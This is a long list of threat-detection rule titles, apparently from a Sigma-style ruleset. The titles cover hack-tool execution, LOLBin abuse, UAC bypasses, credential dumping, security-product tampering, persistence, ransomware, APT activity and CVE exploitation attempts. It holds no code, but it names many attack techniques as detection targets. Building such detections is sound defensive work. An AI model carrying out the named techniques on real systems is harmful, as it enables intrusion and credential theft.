  • HackTool - SILENTTRINITY Stager Execution
  • HackTool - SOAPHound Execution
  • HackTool - Stracciatella Execution
  • HackTool - TruffleSnout Execution
  • HackTool - UACMe Akagi Execution
  • HackTool - winPEAS Execution
  • HackTool - WinPwn Execution
  • HackTool - Wmiexec Default Powershell Command
  • HackTool - XORDump Execution
  • Suspicious HWP Sub Processes
  • File Download And Execution Via IEExec.EXE
  • Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
  • Disable Windows IIS HTTP Logging
  • Microsoft IIS Service Account Password Dumped
  • Microsoft IIS Connection Strings Decryption
  • Suspicious IIS Module Registration
  • ImagingDevices Unusual Parent/Child Processes
  • Arbitrary File Download Via IMEWDBLD.EXE
  • Suspicious Shells Spawn by Java Utility Keytool
  • Suspicious Child Process Of Manage Engine ServiceDesk
  • Suspicious Processes Spawned by Java.EXE
  • Kavremover Dropped Binary LOLBIN Usage
  • Suspicious Windows Trace ETW Session Tamper Via Logman.EXE
  • Devtoolslauncher.exe Executes Specified Binary
  • Potential Manage-bde.wsf Abuse To Proxy Execution
  • Mavinject Inject DLL Into Running Process
  • MpiExec Lolbin
  • Execute MSDT Via Answer File
  • OpenWith.exe Executes Specified Binary
  • Execute Pcwrun.EXE To Leverage Follina
  • PrintBrm ZIP Creation of Extraction
  • Using SettingSyncHost.exe as LOLBin
  • Suspicious Certreq Command to Download
  • Suspicious GrpConv Execution
  • Time Travel Debugging Utility Usage
  • Visual Basic Command Line Compiler Usage
  • MMC20 Lateral Movement
  • MMC Spawning Windows Shell
  • Potential Suspicious Mofcomp Execution
  • Potential Mpclient.DLL Sideloading Via Defender Binaries
  • File Download Via Windows Defender MpCmpRun.EXE
  • Windows Defender Definition Files Removed
  • Potential Arbitrary Command Execution Using Msdt.EXE
  • Suspicious MSDT Parent Process
  • Remotely Hosted HTA File Executed Via Mshta.EXE
  • Suspicious JavaScript Execution Via Mshta.EXE
  • Potential LethalHTA Technique Execution
  • Suspicious MSHTA Child Process
  • MSHTA Suspicious Execution 01
  • Suspicious Mshta.EXE Execution Patterns
  • Potential MsiExec Masquerading
  • Potential Process Injection Via Msra.EXE
  • Suspicious Child Process Of SQL Server
  • Potential MSTSC Shadowing Activity
  • Suspicious Mstsc.EXE Execution With Local RDP File
  • Mstsc.EXE Execution From Uncommon Parent
  • Remote XSL Execution Via Msxsl.EXE
  • Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE
  • RDP Connection Allowed Via Netsh.EXE
  • RDP Port Forwarding Rule Added Via Netsh.EXE
  • New User Created Via Net.EXE With Never Expire Option
  • Suspicious Manipulation Of Default Accounts Via Net.EXE
  • Windows Internet Hosted WebDav Share Mount Via Net.EXE
  • Potential Arbitrary Code Execution Via Node.EXE
  • Network Reconnaissance Activity
  • Suspicious Driver/DLL Installation Via Odbcconf.EXE
  • Odbcconf.EXE Suspicious DLL Location
  • Potentially Suspicious DLL Registered Via Odbcconf.EXE
  • Suspicious Response File Execution Via Odbcconf.EXE
  • Potential Arbitrary File Download Using Office Application
  • Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
  • Potentially Suspicious Office Document Executed From Trusted Location
  • OneNote.EXE Execution of Malicious Embedded Scripts
  • Suspicious Microsoft OneNote Child Process
  • Outlook EnableUnsafeClientMailRules Setting Enabled
  • Suspicious Execution From Outlook Temporary Folder
  • Suspicious Outlook Child Process
  • Suspicious Remote Child Process From Outlook
  • Suspicious Binary In User Directory Spawned From Office Application
  • Suspicious Microsoft Office Child Process
  • Ping Hex IP
  • Suspicious Plink Port Forwarding
  • Potential RDP Tunneling Via Plink
  • AADInternals PowerShell Cmdlets Execution - ProccessCreation
  • Potential AMSI Bypass Via .NET Reflection
  • Suspicious Encoded PowerShell Command Line
  • Suspicious PowerShell Encoded Command Patterns
  • Suspicious Obfuscated PowerShell Code
  • PowerShell Base64 Encoded FromBase64String Cmdlet
  • Malicious Base64 Encoded PowerShell Keywords in Command Lines
  • PowerShell Base64 Encoded IEX Cmdlet
  • PowerShell Base64 Encoded Invoke Keyword
  • Powershell Base64 Encoded MpPreference Cmdlet
  • PowerShell Base64 Encoded Reflective Assembly Load
  • Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
  • PowerShell Base64 Encoded WMI Classes
  • Potential PowerShell Obfuscation Via Reversed Commands
  • Potential PowerShell Command Line Obfuscation
  • PowerShell Execution With Potential Decryption Capabilities
  • Powershell Defender Disable Scan Feature
  • Disable Windows Defender AV Security Monitoring
  • Disabled IE Security Features
  • Obfuscated PowerShell OneLiner Execution
  • PowerShell Download and Execution Cradles
  • Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
  • DSInternals Suspicious PowerShell Cmdlets
  • Email Exifiltration Via Powershell
  • Base64 Encoded PowerShell Command Detected
  • PowerShell Get-Process LSASS
  • Abuse of Service Permissions to Hide Services Via Set-Service
  • Suspicious PowerShell IEX Execution Patterns
  • Root Certificate Installed From Susp Locations
  • Suspicious Invoke-WebRequest Execution
  • Malicious PowerShell Commandlets - ProcessCreation
  • Potential PowerShell Obfuscation Via WCHAR
  • Execution of Powershell Script in Public Folder
  • Tamper Windows Defender Remove-MpPreference
  • RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
  • Potential Powershell ReverseShell Connection
  • Run PowerShell Script from ADS
  • Run PowerShell Script from Redirected Input Stream
  • PowerShell SAM Copy
  • Suspicious Service DACL Modification Via Set-Service Cmdlet
  • PowerShell Set-Acl On Windows Folder
  • PowerShell Script Change Permission Via Set-Acl
  • Deletion of Volume Shadow Copies via WMI with PowerShell
  • Exchange PowerShell Snap-Ins Usage
  • Suspicious PowerShell Download and Execute Pattern
  • Suspicious PowerShell Parameter Substring
  • Suspicious PowerShell Parent Process
  • Powershell Token Obfuscation - Process Creation
  • PowerShell DownloadFile
  • Net WebClient Casing Anomalies
  • Suspicious Provlaunch.EXE Child Process
  • PUA - 3Proxy Execution
  • PUA - AdFind Suspicious Execution
  • PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
  • PUA - AdvancedRun Suspicious Execution
  • PUA - Chisel Tunneling Tool Execution
  • PUA - CleanWipe Execution
  • PUA - Crassus Execution
  • PUA - CsExec Execution
  • PUA - DIT Snapshot Viewer
  • PUA - DefenderCheck Execution
  • PUA - Fast Reverse Proxy (FRP) Execution
  • PUA- IOX Tunneling Tool Execution
  • PUA - Netcat Suspicious Execution
  • PUA - Ngrok Execution
  • PUA - Nimgrab Execution
  • PUA - NirCmd Execution As LOCAL SYSTEM
  • PUA - NPS Tunneling Tool Execution
  • PUA - NSudo Execution
  • PUA - PingCastle Execution From Potentially Suspicious Parent
  • PUA - Rclone Execution
  • PUA - RunXCmd Execution
  • PUA - Seatbelt Execution
  • PUA - Wsudo Suspicious Execution
  • Python Spawning Pretty TTY on Windows
  • Rar Usage with Password and Compression Level
  • Suspicious Greedy Compression Using Rar.EXE
  • Process Memory Dump via RdrLeakDiag.EXE
  • Exports Critical Registry Keys To a File
  • Imports Registry Key From an ADS
  • Regedit as Trusted Installer
  • Suspicious Registry Modification From ADS Via Regini.EXE
  • Suspicious Debugger Registration Cmdline
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI
  • Potential Persistence Via Logon Scripts - CommandLine
  • Potential Credential Dumping Attempt Using New NetworkProvider - CLI
  • Python Function Execution Security Warning Disabled In Excel
  • Potential Privilege Escalation via Service Permissions Weakness
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution
  • Potential PowerShell Execution Policy Tampering - ProcCreation
  • Potentially Suspicious Regsvr32 HTTP IP Pattern
  • Suspicious Regsvr32 Execution From Remote Share
  • Potentially Suspicious Child Process Of Regsvr32
  • Regsvr32 Execution From Highly Suspicious Location
  • Regsvr32 DLL Execution With Suspicious File Extension
  • Add SafeBoot Keys Via Reg Utility
  • Suspicious Reg Add BitLocker
  • SafeBoot Registry Key Deleted Via Reg.EXE
  • Service Registry Key Deleted Via Reg.EXE
  • Security Service Disabled Via Reg.EXE
  • Dumping of Sensitive Hives Via Reg.EXE
  • LSA PPL Protection Disabled Via Reg.EXE
  • Enable LM Hash Storage - ProcCreation
  • RestrictedAdminMode Registry Value Tampering - ProcCreation
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE
  • Reg Add Suspicious Paths
  • Disabled Volume Snapshots
  • Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
  • Remote Access Tool - AnyDesk Silent Installation
  • Remote Access Tool - Anydesk Execution From Suspicious Folder
  • Remote Access Tool - ScreenConnect Server Web Shell Execution
  • Renamed AdFind Execution
  • Renamed AutoIt Execution
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries
  • Renamed BrowserCore.EXE Execution
  • Renamed Cloudflared.EXE Execution
  • Renamed CreateDump Utility Execution
  • Renamed ZOHO Dctask64 Execution
  • Renamed Gpg.EXE Execution
  • Renamed Jusched.EXE Execution
  • Renamed Mavinject.EXE Execution
  • Renamed MegaSync Execution
  • Renamed Msdt.EXE Execution
  • Renamed NetSupport RAT Execution
  • Renamed NirCmd.EXE Execution
  • Renamed Office Binary Execution
  • Renamed PAExec Execution
  • Renamed PingCastle Binary Execution
  • Renamed Plink Execution
  • Potential Renamed Rundll32 Execution
  • Renamed SysInternals DebugView Execution
  • Renamed ProcDump Execution
  • Renamed PsExec Service Execution
  • Renamed Sysinternals Sdelete Execution
  • Renamed Vmnat.exe Execution
  • Potential Rundll32 Execution With DLL Stored In ADS
  • Suspicious Advpack Call Via Rundll32.EXE
  • Suspicious Rundll32 Invoking Inline VBScript
  • Suspicious Key Manager Access
  • Rundll32 Execution Without CommandLine Parameters
  • Mshtml.DLL RunHTMLApplication Suspicious Usage
  • Suspicious NTLM Authentication on the Printer Spooler Service
  • Process Memory Dump Via Comsvcs.DLL
  • Rundll32 Registered COM Objects
  • Shell32 DLL Execution in Suspicious Directory
  • RunDLL32 Spawning Explorer
  • Suspicious Control Panel DLL Load
  • Suspicious Rundll32 Execution With Image Extension
  • Suspicious Usage Of ShellExec_RunDLL
  • Suspicious ShellExec_RunDLL Call Via Ordinal
  • ShimCache Flush
  • Suspicious Rundll32 Activity Invoking Sys File
  • Rundll32 UNC Path Execution
  • Suspicious Modification Of Scheduled Tasks
  • Suspicious WebDav Client Execution Via Rundll32.EXE
  • Rundll32 Execution Without Parameters
  • Suspicious Schtasks Execution AppData Folder
  • Suspicious Scheduled Task Creation Involving Temp Folder
  • Delete Important Scheduled Task
  • Delete All Scheduled Tasks
  • Disable Important Scheduled Task
  • Schtasks From Suspicious Folders
  • Uncommon One Time Only Scheduled Task At 00:00
  • Potential Persistence Via Powershell Search Order Hijacking - Task
  • Scheduled Task Executing Encoded Payload from Registry
  • Suspicious Schtasks Schedule Types
  • Suspicious Command Patterns In Scheduled Task Creation
  • Schtasks Creation Or Modification With SYSTEM Privileges
  • Script Event Consumer Spawning Process
  • Possible Privilege Escalation via Weak Service Permissions
  • Allow Service Access Using Security Descriptor Tampering Via Sc.EXE
  • Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
  • Service DACL Abuse To Hide Services Via Sc.EXE
  • Suspicious Service Path Modification
  • Sdiagnhost Calling Suspicious Child Process
  • Suspicious Serv-U Process Pattern
  • Uncommon Child Process Of Setres.EXE
  • Suspicious Splwow64 Without Params
  • Suspicious Spool Service Child Process
  • VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
  • SQLite Chromium Profile Data DB Access
  • SQLite Firefox Profile Data DB Access
  • Potential RDP Tunneling Via SSH
  • Execution via stordiag.exe
  • Abused Debug Privilege by Arbitrary Parent Processes
  • User Added To Highly Privileged Group
  • User Added to Remote Desktop Users Group
  • Phishing Pattern ISO in Archive
  • Bad Opsec Defaults Sacrificial Processes With Improper Arguments
  • Suspicious Child Process Created as System
  • Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image
  • Potential Crypto Mining Activity
  • LOL-Binary Copied From System Directory
  • Potential Data Exfiltration Activity Via CommandLine Tools
  • Raccine Uninstall
  • Suspicious Parent Double Extension File Execution
  • Suspicious Download from Office Domain
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
  • ETW Logging Tamper In .NET Processes Via CommandLine
  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
  • ETW Trace Evasion Activity
  • Suspicious Eventlog Clearing or Configuration Change Activity
  • Potentially Suspicious Execution From Parent Process In Public Folder
  • Process Execution From A Potentially Suspicious Folder
  • Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
  • Execution Of Non-Existing File
  • Base64 MZ Header In CommandLine
  • Potential WinAPI Calls Via CommandLine
  • LSASS Dump Keyword In CommandLine
  • Non-privileged Usage of Reg or Powershell
  • Suspicious Process Patterns NTDS.DIT Exfil
  • Potentially Suspicious Call To Win32_NTEventlogFile Class
  • Suspicious Process Parents
  • Potential PowerShell Execution Via DLL
  • Privilege Escalation via Named Pipe Impersonation
  • Suspicious Program Names
  • Suspicious Process Execution From Fake Recycle.Bin Folder
  • Suspicious Redirection to Local Admin Share
  • Potential Defense Evasion Via Right-to-Left Override
  • Script Interpreter Execution From Suspicious Folder
  • Suspicious Script Execution From Temp Folder
  • Sensitive File Access Via Volume Shadow Copy Backup
  • Suspicious New Service Creation
  • Suspicious Service Binary Directory
  • Suspicious Windows Service Tampering
  • System File Execution Location Anomaly
  • Shadow Copies Deletion Using Operating Systems Utilities
  • Windows Shell/Scripting Processes Spawning Suspicious Programs
  • Suspicious SYSTEM User Process Creation
  • Tasks Folder Evasion
  • WhoAmI as Parameter
  • Execution via WorkFolders.exe
  • Suspect Svchost Activity
  • Suspicious Process Masquerading As SvcHost.EXE
  • Terminal Service Process Spawn
  • Suspicious Active Directory Database Snapshot Via ADExplorer
  • Kernel Memory Dump Via LiveKD
  • Potential SysInternals ProcDump Evasion
  • Potential LSASS Process Dump Via Procdump
  • PsExec/PAExec Escalation to LOCAL SYSTEM
  • Potential PsExec Remote Execution
  • PsExec Service Child Process Execution as LOCAL SYSTEM
  • Sysinternals PsSuspend Suspicious Execution
  • Potential File Overwrite Via Sysinternals SDelete
  • Potential Privilege Escalation To LOCAL SYSTEM
  • Uninstall Sysinternals Sysmon
  • Potential Signing Bypass Via Windows Developer Features
  • Taskkill Symantec Endpoint Protection
  • Taskmgr as LOCAL_SYSTEM
  • Suspicious TSCON Start as SYSTEM
  • Bypass UAC via CMSTP
  • Suspicious RDP Redirect Using TSCON
  • UAC Bypass Using Disk Cleanup
  • UAC Bypass Using ChangePK and SLUI
  • CMSTP UAC Bypass via COM Object Access
  • UAC Bypass Tools Using ComputerDefaults
  • UAC Bypass Using Consent and Comctl32 - Process
  • UAC Bypass Using DismHost
  • Bypass UAC via Fodhelper.exe
  • UAC Bypass Using Event Viewer RecentViews
  • UAC Bypass Using NTFS Reparse Point - Process
  • UAC Bypass via ICMLuaUtil
  • UAC Bypass Using IDiagnostic Profile
  • UAC Bypass Using IEInstal - Process
  • UAC Bypass Using MSConfig Token Modification - Process
  • UAC Bypass Using PkgMgr and DISM
  • UAC Bypass Abusing Winsat Path Parsing - Process
  • UAC Bypass Using Windows Media Player - Process
  • Bypass UAC via WSReset.exe
  • UAC Bypass WSReset
  • Suspicious UltraVNC Execution
  • Uninstall Crowdstrike Falcon Sensor
  • Uncommon Userinit Child Process
  • Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
  • VMToolsd Suspicious Child Process
  • Renamed Visual Studio Code Tunnel Execution
  • Use of W32tm as Timer
  • Wab Execution From Non Default Location
  • Wab/Wabmig Unusual Parent Or Child Processes
  • All Backups Deleted Via Wbadmin.EXE
  • Sensitive File Dump Via Wbadmin.EXE
  • Sensitive File Recovery From Backup Via Wbadmin.EXE
  • Chopper Webshell Process Pattern
  • Webshell Hacking Activity Patterns
  • Webshell Detection With Command Line Keywords
  • Suspicious Process By Web Server Process
  • Potential Credential Dumping Via WER
  • Webshell Tool Reconnaissance Activity
  • Suspicious Child Process Of Wermgr.EXE
  • Suspicious Execution Location Of Wermgr.EXE
  • Suspicious File Download From IP Via Wget.EXE
  • Suspicious File Download From File Sharing Domain Via Wget.EXE
  • Suspicious File Download From IP Via Wget.EXE - Paths
  • Whoami.EXE Execution From Privileged Process
  • Security Privileges Enumeration Via Whoami.EXE
  • Add Insecure Download Source To Winget
  • Suspicious Processes Spawned by WinRM
  • New ActiveScriptEventConsumer Created Via Wmic.EXE
  • Potential Windows Defender Tampering Via Wmic.EXE
  • Suspicious WMIC Execution Via Office Process
  • Suspicious Process Created Via Wmic.EXE
  • Potential Tampering With Security Products Via WMIC
  • Suspicious WmiPrvSE Child Process
  • UEFI Persistence Via Wpbbin - ProcessCreation
  • Cscript/Wscript Uncommon Script Extension Execution
  • Proxy Execution Via Wuauclt.EXE
  • Suspicious Windows Update Agent Empty Cmdline
  • Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
  • Wusa.EXE Executed By Parent Process Located In Suspicious Location
  • Xwizard.EXE Execution From Non-Default Location
  • Potential NetWire RAT Activity - Registry
  • Potential Persistence Via New AMSI Providers - Registry
  • Suspicious Execution Of Renamed Sysinternals Tools - Registry
  • Folder Removed From Exploit Guard ProtectedFolders List - Registry
  • Terminal Server Client Connection History Cleared - Registry
  • Removal Of AMSI Provider Registry Keys
  • Creation of a Local Hidden User Account by Registry
  • UAC Bypass Via Wsreset
  • CMSTP Execution Registry Event
  • Disable Security Events Logging Adding Reg Key MiniNt
  • Esentutl Volume Shadow Copy Service Keys
  • Wdigest CredGuard Registry Modification
  • HybridConnectionManager Service Installation - Registry
  • Potential Qakbot Registry Activity
  • Narrator's Feedback-Hub Persistence
  • NetNTLM Downgrade Attack - Registry
  • Registry Persistence Mechanisms in Recycle Bin
  • RedMimicry Winnti Playbook Registry Manipulation
  • WINEKEY Registry Modification
  • Shell Open Registry Keys Manipulation
  • Security Support Provider (SSP) Added to LSA Configuration
  • Suspicious Run Key from Download
  • DLL Load via LSASS
  • Suspicious Camera and Microphone Access
  • Registry Persistence via Service in Safe Mode
  • Potential AMSI COM Server Hijacking
  • Bypass UAC Using Event Viewer
  • Blackbyte Ransomware Registry
  • Bypass UAC Using DelegateExecute
  • Bypass UAC Using SilentCleanup Task
  • Default RDP Port Changed to Non Standard Port
  • Sysmon Driver Altitude Change
  • Change Winevt Channel Access Permission Via Registry
  • Running Chrome VPN Extensions via the Registry 2 VPN Extension
  • Potential CobaltStrike Service Installations - Registry
  • COM Hijack via Sdclt
  • Service Binary in Suspicious Folder
  • Custom File Open Handler Executes PowerShell
  • Antivirus Filter Driver Disallowed On Dev Drive - Registry
  • Hypervisor Enforced Code Integrity Disabled
  • Hypervisor Enforced Paging Translation Disabled
  • DHCP Callout DLL Installation
  • Disabled Windows Defender Eventlog
  • Disable PUA Protection on Windows Defender
  • Potential AutoLogger Sessions Tampering
  • Disable Macro Runtime Scan Scope
  • Registry Disable System Restore
  • Windows Defender Service Disabled - Registry
  • Disable Windows Event Logging Via Registry
  • New DNS ServerLevelPluginDll Installed
  • ETW Logging Disabled In .NET Processes - Sysmon Registry
  • Directory Service Restore Mode (DSRM) Registry Value Tampering
  • Potential EventLog File Location Tampering
  • Suspicious Application Allowed Through Exploit Guard
  • Change User Account Associated with the FAX Service
  • Change the Fax Dll
  • New File Association Using Exefile
  • Add Debugger Entry To Hangs Key For Persistence
  • Persistence Via Hhctrl.ocx
  • Hide Schedule Task Via Index Value Tamper
  • Driver Added To Disallowed Images In HVCI - Registry
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
  • Uncommon Extension In Keyboard Layout IME File Registry Value
  • Suspicious Path In Keyboard Layout IME File Registry Value
  • Potential Ransomware Activity Using LegalNotice Message
  • Lolbas OneDriveStandaloneUpdater.exe Proxy Download
  • Lsass Full Dump Request Via DumpType Registry Settings
  • RestrictedAdminMode Registry Value Tampering
  • Blue Mockingbird - Registry
  • New Netsh Helper DLL Registered From A Suspicious Location
  • NET NGenAssemblyUsageLog Registry Key Tamper
  • Potentially Suspicious ODBC Driver Registered
  • Microsoft Office Protected View Disabled
  • Trust Access Disable For VBApplications
  • Python Function Execution Security Warning Disabled In Excel - Registry
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
  • Outlook Macro Execution Without Warning Setting Enabled
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
  • Uncommon Microsoft Office Trusted Location Added
  • Macro Enabled In A Potentially Suspicious Document
  • Office Macros Warning Disabled
  • Potential Persistence Via App Paths Default Property
  • Potential Persistence Via AutodialDLL
  • Potential Persistence Via CHM Helper DLL
  • Potential PSFactoryBuffer COM Hijacking
  • COM Object Hijacking Via Modification Of Default System CLSID Default Value
  • Potential Persistence Via GlobalFlags
  • Potential Persistence Via LSA Extensions
  • Potential Persistence Via Mpnotify
  • Potential Persistence Via Excel Add-in - Registry
  • Potential Persistence Via MyComputer Registry Keys
  • Potential Persistence Via TypedPaths
  • Potential Persistence Via Outlook Today Page
  • Potential WerFault ReflectDebugger Registry Value Abuse
  • Suspicious Shim Database Patching Activity
  • Potential Attachment Manager Settings Associations Tamper
  • Potential Persistence Via Outlook Home Page
  • Potential Persistence Via DLLPathOverride
  • Potential Persistence Via Shim Database In Uncommon Location
  • Potential Attachment Manager Settings Attachments Tamper
  • PowerShell as a Service in Registry
  • PowerShell Logging Disabled Via Registry Key Tampering
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
  • Usage of Renamed Sysinternals Tools - RegistrySet
  • Potentially Suspicious Command Executed Via Run Dialog Box - Registry
  • Tamper With Sophos AV Registry Keys
  • Hiding User Account Via SpecialAccounts Registry Key
  • Suspicious Environment Variable Has Been Registered
  • Suspicious Printer Driver Empty Manufacturer
  • Registry Persistence via Explorer Run Key
  • New RUN Key Pointing to Suspicious Folder
  • Modify User Shell Folders Startup Value
  • Enable LM Hash Storage
  • Scheduled TaskCache Change by Uncommon Program
  • Potential Registry Persistence Attempt Via Windows Telemetry
  • RDP Sensitive Settings Changed
  • New TimeProviders Registered With Uncommon DLL Name
  • Potential Signing Bypass Via Windows Developer Features - Registry
  • UAC Bypass via Event Viewer
  • UAC Bypass via Sdclt
  • UAC Bypass Abusing Winsat Path Parsing - Registry
  • UAC Bypass Using Windows Media Player - Registry
  • VBScript Payload Stored in Registry
  • Wdigest Enable UseLogonCredential
  • Execution DLL of Choice Using WAB.EXE
  • Disable Windows Defender Functionalities Via Registry Keys
  • Winlogon Notify Key Logon Persistence
  • Sysmon Configuration Error
  • Sysmon Configuration Modification
  • Sysmon Blocked Executable
  • Sysmon Blocked File Shredding
  • Suspicious Scripting in a WMI Consumer
  • Suspicious Encoded Scripts in a WMI Consumer
  • Rejetto HTTP File Server RCE
  • Adwind RAT / JRAT
  • Fireball Archer Install
  • Malware Shellcode in Verclsid Target Process
  • Potential PlugX Activity
  • StoneDrill Service Install
  • Potential APT10 Cloud Hopper Activity
  • Ps.exe Renamed SysInternals Tool
  • Equation Group C2 Communication
  • Lazarus System Binary Masquerading
  • Turla Service Install
  • Sofacy Trojan Loader Activity
  • Potential MuddyWater APT Activity
  • TropicTrooper Campaign November 2018
  • Potential BearLPE Exploitation
  • Exploiting SetupComplete.cmd CVE-2019-1378
  • Potential Baby Shark Malware Activity
  • Chafer Malware URL Pattern
  • Potential Emotet Activity
  • Formbook Process Creation
  • Potential Ryuk Ransomware Activity
  • Potential Snatch Ransomware Activity
  • Ursnif Malware Download URL Pattern
  • Potential Ursnif Malware Activity - Registry
  • APT40 Dropbox Tool User Agent
  • Potential EmpireMonkey Activity
  • Mustang Panda Dropper
  • Operation Wocao Activity
  • Operation Wocao Activity - Security
  • CVE-2020-0688 Exploitation Attempt
  • CVE-2020-0688 Exploitation via Eventlog
  • ComRAT Network Communication
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
  • Suspicious PrinterPorts Creation (CVE-2020-1048)
  • Exploited CVE-2020-10189 Zoho ManageEngine
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
  • TerraMaster TOS CVE-2020-28188
  • Blue Mockingbird
  • GALLIUM IOCs
  • Trickbot Malware Activity
  • Potential Ke3chang/TidePool Malware Activity
  • Cisco ASA FTD Exploit CVE-2020-3452
  • Oracle WebLogic Exploit CVE-2020-14882
  • GALLIUM Artefacts - Builtin
  • UNC2452 Process Creation Patterns
  • Suspicious VBScript UN2452 Pattern
  • TAIDOOR RAT DLL Load
  • Possible Exploitation of Exchange RCE CVE-2021-42321
  • Possible CVE-2021-1675 Print Spooler Exploitation
  • CVE-2021-21972 VSphere Exploitation
  • CVE-2021-21978 Exploitation Attempt
  • VMware vCenter Server File Upload CVE-2021-22005
  • Pulse Connect Secure RCE Attack CVE-2021-22893
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
  • Potential CVE-2021-26084 Exploitation Attempt
  • Exploitation of CVE-2021-26814 in Wazuh
  • Potential CVE-2021-26857 Exploitation Attempt
  • CVE-2021-26858 Exchange Exploitation
  • Suspicious Word Cab File Write CVE-2021-40444
  • Potential CVE-2021-40444 Exploitation Attempt
  • Potential Exploitation Attempt From Office Application
  • ADSelfService Exploitation
  • LPE InstallerFileTakeOver PoC CVE-2021-41379
  • CVE-2021-41773 Exploitation Attempt
  • Sitecore Pre-Auth RCE CVE-2021-42237
  • Suspicious Computer Account Name Change CVE-2021-42287
  • CVE-2021-44077 POC Default Dropped File
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon
  • Log4j RCE CVE-2021-44228 Generic
  • Log4j RCE CVE-2021-44228 in Fields
  • Exchange ProxyShell Pattern
  • Suspicious RazerInstaller Explorer Subprocess
  • SonicWall SSL/VPN Jarrewrite Exploitation
  • Potential BlackByte Ransomware Activity
  • Conti Volume Shadow Listing
  • Conti NTDS Exfiltration Command
  • Potential Conti Ransomware Database Dumping Activity Via SQLCmd
  • Potential Devil Bait Related Indicator
  • Potential Devil Bait Malware Reconnaissance
  • Devil Bait Potential C2 Communication Traffic
  • Goofy Guineapig Backdoor IOC
  • Potential Goofy Guineapig Backdoor Activity
  • Potential Goofy Guineapig GoolgeUpdate Process Anomaly
  • Goofy Guineapig Backdoor Potential C2 Communication
  • Pingback Backdoor File Indicators
  • Pingback Backdoor DLL Loading Activity
  • Pingback Backdoor Activity
  • Small Sieve Malware File Indicator Creation
  • Small Sieve Malware CommandLine Indicator
  • Small Sieve Malware Registry Persistence
  • Exchange Exploitation Used by HAFNIUM
  • APT PRIVATELOG Image Load Pattern
  • SOURGUM Actor Behaviours
  • DEWMODE Webshell Access
  • Potential CVE-2023-21554 QueueJumper Exploitation
  • Potential CVE-2022-21587 Exploitation Attempt
  • CVE-2022-24527 Microsoft Connected Cache LPE
  • Potential CVE-2022-26809 Exploitation Attempt
  • Potential CVE-2022-29072 Exploitation Attempt
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass
  • Apache Spark Shell Command Injection - Weblogs
  • Atlassian Bitbucket Command Injection Via Archive API
  • Potential OWASSRF Exploitation Attempt - Proxy
  • Potential OWASSRF Exploitation Attempt - Webserver
  • Suspicious Sysmon as Execution Parent
  • Exploitation Indicator Of CVE-2022-42475
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877
  • Potential CVE-2022-46169 Exploitation Attempt
  • MSSQL Extended Stored Procedure Backdoor Maggie
  • BlueSky Ransomware Artefacts
  • Potential Bumblebee Remote Thread Creation
  • ChromeLoader Malware Execution
  • Emotet Loader Execution Via .LNK File
  • Hermetic Wiper TG Process Patterns
  • Raspberry Robin Subsequent Execution of Commands
  • Raspberry Robin Initial Execution From External Drive
  • Serpent Backdoor Payload Execution Via Scheduled Task
  • Potential Raspberry Robin Dot Ending File
  • Potential ACTINIUM Persistence Activity
  • FakeUpdates/SocGholish Activity
  • MERCURY APT Activity
  • MSMQ Corrupted Packet Encountered
  • Exploitation Indicators Of CVE-2023-20198
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
  • Potential CVE-2023-23752 Exploitation Attempt
  • Potential CVE-2023-25157 Exploitation Attempt
  • Potential CVE-2023-25717 Exploitation Attempt
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
  • Potential CVE-2303-36884 URL Request Pattern Traffic
  • Potential CVE-2023-36884 Exploitation - URL Marker
  • Potential CVE-2023-36884 Exploitation - Share Access
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code
  • CVE-2023-46747 Exploitation Activity - Proxy
  • CVE-2023-46747 Exploitation Activity - Webserver
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE
  • Potential SocGholish Second Stage C2 DNS Query
  • Potential COLDSTEEL RAT File Indicators
  • Potential COLDSTEEL Persistence Service DLL Creation
  • Potential COLDSTEEL Persistence Service DLL Load
  • COLDSTEEL RAT Anonymous User Process Execution
